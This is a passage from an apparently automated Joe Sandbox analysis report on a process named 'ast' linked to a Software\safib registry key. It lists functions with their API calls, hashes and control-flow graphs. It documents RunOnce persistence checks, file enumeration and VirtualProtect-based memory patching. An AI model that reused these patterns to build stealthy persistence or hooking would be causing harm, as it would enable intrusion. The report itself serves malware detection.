                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$Filelstrcat$CloseFirstNextlstrcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1879274390-0
                                                                                                                                            • Opcode ID: 70b5ff2c0fc0bb8fa303ac7d35febad6c2a08c39db5145e1b3e05b7e95ce917f
                                                                                                                                            • Instruction ID: 48930648d8357c57954e6677d38f9d7224ea0c235247584ba3584c7cbcae87d4
                                                                                                                                            • Opcode Fuzzy Hash: 70b5ff2c0fc0bb8fa303ac7d35febad6c2a08c39db5145e1b3e05b7e95ce917f
                                                                                                                                            • Instruction Fuzzy Hash: 4C0184F6904102AFDB216F74DC4DE8A7FE8FF06361F014691B14AD1651DE39C5708BA1
                                                                                                                                            Function 070025DB Relevance: 4.6, APIs: 3, Instructions: 51fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 070025F0
                                                                                                                                              • Part of subcall function 07002600: FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                              • Part of subcall function 07002600: FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                            • Opcode ID: 1eb6915bd640217e1bb379b7e11fdc0ddc438a719cfb2687d39b3bf75919ac49
                                                                                                                                            • Instruction ID: 48930648d8357c57954e6677d38f9d7224ea0c235247584ba3584c7cbcae87d4
                                                                                                                                            • Opcode Fuzzy Hash: 1eb6915bd640217e1bb379b7e11fdc0ddc438a719cfb2687d39b3bf75919ac49
                                                                                                                                            • Instruction Fuzzy Hash: 4C0184F6904102AFDB216F74DC4DE8A7FE8FF06361F014691B14AD1651DE39C5708BA1
                                                                                                                                            Function 070021FF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetUserNameA.ADVAPI32(00000400,00000400), ref: 07002213
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                            • Opcode ID: e8fe1bac36dbdb6a1b6b5f752de825343a0cede534e44747f09e6a20301a06c7
                                                                                                                                            • Instruction ID: 296470ea2d1905e73cca287aa37e26fdfe67e2562d18cc4f69aa6f6bc27716d3
                                                                                                                                            • Opcode Fuzzy Hash: e8fe1bac36dbdb6a1b6b5f752de825343a0cede534e44747f09e6a20301a06c7
                                                                                                                                            • Instruction Fuzzy Hash: 52C08CB040020DFBDF00EF90E90A89D7BB8AB80348F0081A4E60166044DBB8AB0ADBD1
                                                                                                                                            Function 07003673 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 109COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateQueryValue
                                                                                                                                            • String ID: Software\safib$\ast\SS$config$config.ini
                                                                                                                                            • API String ID: 4083198587-3540514454
                                                                                                                                            • Opcode ID: c5565a7de491dc6568a0463004f9f232f8743b40bfe636c98245bcad8558ac9b
                                                                                                                                            • Instruction ID: 54b41f1fe5fe27843e7c018b9d3c75928e29cad011c0b2775ef03252e870227f
                                                                                                                                            • Opcode Fuzzy Hash: c5565a7de491dc6568a0463004f9f232f8743b40bfe636c98245bcad8558ac9b
                                                                                                                                            • Instruction Fuzzy Hash: F13150F0644206AFFB629BA4DC49FEEB6B9AF49760F004218F605F51C0DBA495148BE5
                                                                                                                                            Function 07003689 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,000F023F,00000000,00000000,00000000), ref: 070036AC
                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 070036CD
                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 070037C1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateQueryValue
                                                                                                                                            • String ID: config$config.ini
                                                                                                                                            • API String ID: 4083198587-1050631951
                                                                                                                                            • Opcode ID: 5591b2bdcd667e0dc1ed13bf0b24785abe6a8311ef86c373d874d757be97df73
                                                                                                                                            • Instruction ID: f8164400ffbbbeb80d2cb5443178fb01a6a09cab8e3bf54856d78385db98791e
                                                                                                                                            • Opcode Fuzzy Hash: 5591b2bdcd667e0dc1ed13bf0b24785abe6a8311ef86c373d874d757be97df73
                                                                                                                                            • Instruction Fuzzy Hash: EA313FF1604206AFFB619BA49C49FEEB7B9EF49760F000229F605F51C0DB7495148BE5
                                                                                                                                            Function 07001120 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\RunOncet,00000000,000F013F,?), ref: 070011AA
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00007361,00000000,?,00000000,?), ref: 070011D0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: OpenQueryValue
                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOncet$as$t
                                                                                                                                            • API String ID: 4153817207-21673019
                                                                                                                                            • Opcode ID: 07ccce7c00709dfb5ed2f072ac9779c40d4c477e807be4cf1ae99becfacdb78c
                                                                                                                                            • Instruction ID: 807d549a89ba713b3af90846bc0531ba34918e81cebad7387fd2e56a28287112
                                                                                                                                            • Opcode Fuzzy Hash: 07ccce7c00709dfb5ed2f072ac9779c40d4c477e807be4cf1ae99becfacdb78c
                                                                                                                                            • Instruction Fuzzy Hash: A9311EB0900219EEEF10CF91DD45BEDBBB9FB84B04F108188E2047A195D7755B54CFA5
                                                                                                                                            Function 07002F49 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 23 7002f49-7002f52 24 7002f54-7002f5b 23->24 25 7002f8f-7002fac CreateFileA 23->25 24->25 26 7002f5d-7002f6f StrRStrIA 24->26 27 7002f71-7002f83 StrRStrIA 26->27 28 7002f85-7002f8c 26->28 27->25 27->28
                                                                                                                                            APIs
                                                                                                                                            • StrRStrIA.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\template\), ref: 07002F67
                                                                                                                                            • StrRStrIA.SHELL32(?,00000000,07002F39), ref: 07002F7B
                                                                                                                                            • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07002FA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\template\$\log\
                                                                                                                                            • API String ID: 823142352-3936820877
                                                                                                                                            • Opcode ID: 5734137e3d3e21c1bc9ea989c35cfe801174d94c5b249ccbd59912fe7aa57b60
                                                                                                                                            • Instruction ID: 807962b1c990f07df1a7f3e771873767bc626c8793085e9261e2b6c66e2396bc
                                                                                                                                            • Opcode Fuzzy Hash: 5734137e3d3e21c1bc9ea989c35cfe801174d94c5b249ccbd59912fe7aa57b60
                                                                                                                                            • Instruction Fuzzy Hash: 17F0F47124420ABFDF114F55DC49FA93FA6BB187B4F004324B915541E0D77AC560DBD0
                                                                                                                                            Function 07002600 Relevance: 6.0, APIs: 4, Instructions: 44filestringCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • lstrcmp.KERNEL32(?,070025FE), ref: 07002601
                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                            • FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                              • Part of subcall function 07002613: lstrcmp.KERNEL32(?,07002610), ref: 07002614
                                                                                                                                              • Part of subcall function 07002613: lstrcat.KERNEL32(?,?), ref: 0700262F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Findlstrcmp$CloseFileNextlstrcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 360925478-0
                                                                                                                                            • Opcode ID: 8347af9618039bddce6dc3833d99bcdb16e05ca00f3497d069cc847c00fd83a9
                                                                                                                                            • Instruction ID: 857b5770769bc266c9f66974230bcbd2bb08d72b97fdbf925ef538c93592d674
                                                                                                                                            • Opcode Fuzzy Hash: 8347af9618039bddce6dc3833d99bcdb16e05ca00f3497d069cc847c00fd83a9
                                                                                                                                            • Instruction Fuzzy Hash: DB01A2F6504103AFDB226B349C4DA9A7EA4FB06375F050691F14AD1292DF3985708BA1
                                                                                                                                            Function 07002613 Relevance: 6.0, APIs: 4, Instructions: 36stringfileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileNextlstrcatlstrcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 122021188-0
                                                                                                                                            • Opcode ID: 7c2557bd7e75d35374634f4eddea4cccc293c3a17e5eb0acbdb058feac510bfc
                                                                                                                                            • Instruction ID: 64aa9f86ac1cf6e68caf50437448d5f1a04d496337b020d7391166d6dc917870
                                                                                                                                            • Opcode Fuzzy Hash: 7c2557bd7e75d35374634f4eddea4cccc293c3a17e5eb0acbdb058feac510bfc
                                                                                                                                            • Instruction Fuzzy Hash: FCF06DB2600006AFDB225F38DC4DE9A3FE8FB46365F0105A1F20AD1151DB3989709BA4
                                                                                                                                            Function 070034C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 07003539
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID: Software\safib$\ast\SS
                                                                                                                                            • API String ID: 71445658-1250085753
                                                                                                                                            • Opcode ID: 59dc3d164fe29c141267c50fc1dace38b452d2d9365c90f52668a383ceb0a98c
                                                                                                                                            • Instruction ID: 69a62839203a49eb7874f9895f229f59eea3b36cf713c534081d905ed898604d
                                                                                                                                            • Opcode Fuzzy Hash: 59dc3d164fe29c141267c50fc1dace38b452d2d9365c90f52668a383ceb0a98c
                                                                                                                                            • Instruction Fuzzy Hash: A3F054B1244309BFEB125F64DC86B9B7EA9FB04760F404118BA05690A1D7BDD5108AA4
                                                                                                                                            Function 07002E16 Relevance: 4.6, APIs: 3, Instructions: 101memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 67 7002e16-7002e2b 68 7002e31-7002e3c 67->68 69 7002f2b-7002f2d 67->69 70 7002e3e-7002e41 68->70 71 7002e43-7002e4a 70->71 72 7002e56-7002e7d VirtualAlloc 70->72 71->69 77 7002e50-7002e54 71->77 72->69 73 7002e83-7002e90 72->73 75 7002e92-7002ea6 call 70020f0 73->75 76 7002eb5-7002f1f VirtualProtect * 2 73->76 79 7002eab-7002ead 75->79 81 7002f22-7002f26 call 7002196 76->81 77->70 79->81 82 7002eaf-7002eb2 79->82 81->69 82->76
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000005,00003000,00000040,07003327,07006D71,00000000,Tjs,07003015,07006D21,00000000,07002DCF), ref: 07002E78
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000040,00000000), ref: 07002EFB
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000000,00000000), ref: 07002F1F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$Protect$Alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2541858876-0
                                                                                                                                            • Opcode ID: a549656fcd85f9d95a2a45afdec8c74d11b64e5d8fa99e28cc6985e6196b63ad
                                                                                                                                            • Instruction ID: c18e6f3b807005831e0886c9e57001cd6da2221775fa458773f03cbb20bddfa2
                                                                                                                                            • Opcode Fuzzy Hash: a549656fcd85f9d95a2a45afdec8c74d11b64e5d8fa99e28cc6985e6196b63ad
                                                                                                                                            • Instruction Fuzzy Hash: 003172B1A00206EFDB11DF74C948EAEBBF5FF45310F158269E901A7294D771D9018BA0
                                                                                                                                            Function 07002E16 Relevance: 4.6, APIs: 3, Instructions: 101memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000005,00003000,00000040,07003327,07006D71,00000000,Tjs,07003015,07006D21,00000000,07002DCF), ref: 07002E78
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000040,00000000), ref: 07002EFB
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000000,00000000), ref: 07002F1F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$Protect$Alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2541858876-0
                                                                                                                                            • Opcode ID: 32b95ffb181b652bf1628827d4c58c6c6d6bcaad6a5d9983a872a4fa1b8b8e6d
                                                                                                                                            • Instruction ID: c18e6f3b807005831e0886c9e57001cd6da2221775fa458773f03cbb20bddfa2
                                                                                                                                            • Opcode Fuzzy Hash: 32b95ffb181b652bf1628827d4c58c6c6d6bcaad6a5d9983a872a4fa1b8b8e6d
                                                                                                                                            • Instruction Fuzzy Hash: 003172B1A00206EFDB11DF74C948EAEBBF5FF45310F158269E901A7294D771D9018BA0
                                                                                                                                            Function 070020F0 Relevance: 4.6, APIs: 3, Instructions: 68fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 85 70020f0-700212b 88 7002187-7002193 85->88 89 700212d-700214e CreateFileA 85->89 89->88 90 7002150-7002166 CreateFileMappingA 89->90 90->88 91 7002168-700217a MapViewOfFileEx 90->91 91->88 92 700217c-7002185 91->92 92->88
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0700214A
                                                                                                                                            • CreateFileMappingA.KERNEL32(?,00000000,01000002,00000000,00000000,00000000), ref: 0700215E
                                                                                                                                            • MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 07002172
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Create$MappingView
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1299149932-0
                                                                                                                                            • Opcode ID: f46bad0b2b3c9aa24f09e9c8ffdceaecfd36bb87856507ee9aca65486513d887
                                                                                                                                            • Instruction ID: 5688a08ffefda5df113fc91c0b32bb34d3f815869b64ac03b93c5ba7b43ddf51
                                                                                                                                            • Opcode Fuzzy Hash: f46bad0b2b3c9aa24f09e9c8ffdceaecfd36bb87856507ee9aca65486513d887
                                                                                                                                            • Instruction Fuzzy Hash: 601151B4601221BBE7314E36DC4DF977EE9EF467A0F144125BA05DA1C4DA74D411CAA4
                                                                                                                                            Function 070020F0 Relevance: 4.6, APIs: 3, Instructions: 68fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0700214A
                                                                                                                                            • CreateFileMappingA.KERNEL32(?,00000000,01000002,00000000,00000000,00000000), ref: 0700215E
                                                                                                                                            • MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 07002172
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Create$MappingView
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1299149932-0
                                                                                                                                            • Opcode ID: 0aeb705e80eee80c13336de1fe540158615c2235847dc5bd927963451d65ec58
                                                                                                                                            • Instruction ID: 5688a08ffefda5df113fc91c0b32bb34d3f815869b64ac03b93c5ba7b43ddf51
                                                                                                                                            • Opcode Fuzzy Hash: 0aeb705e80eee80c13336de1fe540158615c2235847dc5bd927963451d65ec58
                                                                                                                                            • Instruction Fuzzy Hash: 601151B4601221BBE7314E36DC4DF977EE9EF467A0F144125BA05DA1C4DA74D411CAA4
                                                                                                                                            Function 07002F49 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07002FA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: \log\
                                                                                                                                            • API String ID: 823142352-1104933326
                                                                                                                                            • Opcode ID: 5734137e3d3e21c1bc9ea989c35cfe801174d94c5b249ccbd59912fe7aa57b60
                                                                                                                                            • Instruction ID: 807962b1c990f07df1a7f3e771873767bc626c8793085e9261e2b6c66e2396bc
                                                                                                                                            • Opcode Fuzzy Hash: 5734137e3d3e21c1bc9ea989c35cfe801174d94c5b249ccbd59912fe7aa57b60
                                                                                                                                            • Instruction Fuzzy Hash: 17F0F47124420ABFDF114F55DC49FA93FA6BB187B4F004324B915541E0D77AC560DBD0
                                                                                                                                            Function 07002FAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 0700300A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: .log
                                                                                                                                            • API String ID: 823142352-299349702
                                                                                                                                            • Opcode ID: 004ae152d51f5450933aee293f777839553582fe9d79d33106fafcc8ff741bfd
                                                                                                                                            • Instruction ID: 64e952187e396abdaa5a0913aad62d43737f3e15c4c6792555b0e749a558b0d3
                                                                                                                                            • Opcode Fuzzy Hash: 004ae152d51f5450933aee293f777839553582fe9d79d33106fafcc8ff741bfd
                                                                                                                                            • Instruction Fuzzy Hash: 88F06D7220020AFFEF524F54DC49FAA3FA5BF197B0F008224BA15580E0D77AC460EB80
                                                                                                                                            Function 070034F5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID: Software\safib
                                                                                                                                            • API String ID: 71445658-1607281447
                                                                                                                                            • Opcode ID: 1b291798423dd297edd1b51d5e41dcaf502f7741db7d2e0b4d152223f958d449
                                                                                                                                            • Instruction ID: 674cce69aba6373edc86388b7213247a579e6ad26a734644afbd4f5cc4464e8f
                                                                                                                                            • Opcode Fuzzy Hash: 1b291798423dd297edd1b51d5e41dcaf502f7741db7d2e0b4d152223f958d449
                                                                                                                                            • Instruction Fuzzy Hash: 63E082B240000AFFEF022F50EC868AF7E2AEB293B1F010608B80354061C77BC6309BE1
                                                                                                                                            Function 07001078 Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 070010AD
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 07001111
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                                            • String ID:
